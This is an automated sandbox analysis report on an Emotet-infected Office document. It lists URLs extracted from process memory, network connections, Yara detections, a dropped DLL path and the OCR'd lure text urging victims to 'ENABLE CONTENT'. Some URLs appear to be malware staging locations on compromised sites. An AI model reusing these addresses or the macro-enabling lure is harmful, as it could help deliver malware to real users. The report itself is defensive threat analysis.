Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://indianpornmovies.info/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://kashtanka.tv/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/2021/01/07/7days-7-poriyal-recipes-poriyal-varieties-in-tamil-poriyal-recipe
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/2021/01/07/beyond-keto-virtual-summit-the-mid-life-re-life-blueprint-program
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/2021/01/07/my-southern-keto-kitchen-cookbook-how-i-got-here/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/2021/01/07/my-southern-keto-kitchen-cookbook-how-i-got-here/#respond
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/#respond
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/2021/01/07/the-ketonian-cookbook-quick-and-easy-low-carb/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-ea
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/#respond
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/about-us/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/author/admin/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/category/eating-keto-style/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/category/food-receipes/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/category/health/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/category/keto-cookbook/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/category/keto-diet/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/category/keto-news/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/category/keto-summit/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/category/keto/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/category/weight-loss/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/comments/feed/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/contact-us/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/feed/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/privacy-policy-2/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/shop/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/11.jpg
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/12.jpg
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/reclama-lifestyle.jpg
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/ttt.png
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/7days-7-Poriyal-Recipes-Poriyal-Varieties-in-Tami
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-B
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jp
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.j
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/My-Southern-Keto-Kitchen-Cookbook-HOW-I-GOT-HERE-
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Ma
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogen
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/wp-json/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/xmlrpc.p
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/xmlrpc.p0
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://ketoresetme.com/xmlrpc.php?rsd
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://login.windows.local
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://management.azure.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://management.azure.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://nesaporn.mobi/
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://onlyindianporn.me/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in binary or memory: https://phawayagency.com/wp-admin/mXo4b/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://rajwap.me/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://rajwap.pro/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp	String found in binary or memory: https://rycomputer.com
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp	String found in binary or memory: https://rycomputer.com/content/TL/
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp	String found in binary or memory: https://rycomputer.comx
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000011.00000002.308233755.000001E8C7413000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000011.00000003.307993186.000001E8C7445000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000011.00000003.307993186.000001E8C7445000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000011.00000003.286166612.000001E8C7432000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000011.00000002.308254884.000001E8C743B000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://tasks.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://tubepatrol.porn/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: rundll32.exe, 0000000E.00000003.411786554.0000000003271000.00000004.00000001.sdmp	String found in binary or memory: https://watson.telemet01/o7vtz/g3p9nxague/
Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp	String found in binary or memory: https://watson.telemet8080/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/comments/feed/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/company/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/company/contact/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/feed/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/services/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/services/air-cargo/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/services/cost-calculators/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/services/courier/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/services/ocean-cargo/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/services/trucking/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/track-and-trace/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/wp-admin/admin-ajax.php
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-color.png
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-white1.png
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/12/Transportation-16x16-1.png
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/wp-json/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	String found in binary or memory: https://wheelcomoving.com/xmlrpc.php?rsd
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	String found in binary or memory: https://xxxthtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 58.97.195.135:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.169.246:443 -> 192.168.2.3:49723 version: TLS 1.2

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000D.00000002.284787283.00000000029E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.470768632.0000000003410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.470794872.0000000003431000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.284845000.00000000041B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 14.2.rundll32.exe.3410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.3410000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.29e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.29e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.41b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.3430000.3.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. End of document W Screen 1
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. End of document W Screen 1 of 1 O Type here to
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll

Jump to dropped file

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 5389
Source: unknown	Process created: Commandline size = 5293
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5293

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFAEE111FF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFAEE113139
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001C04A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001D0AC
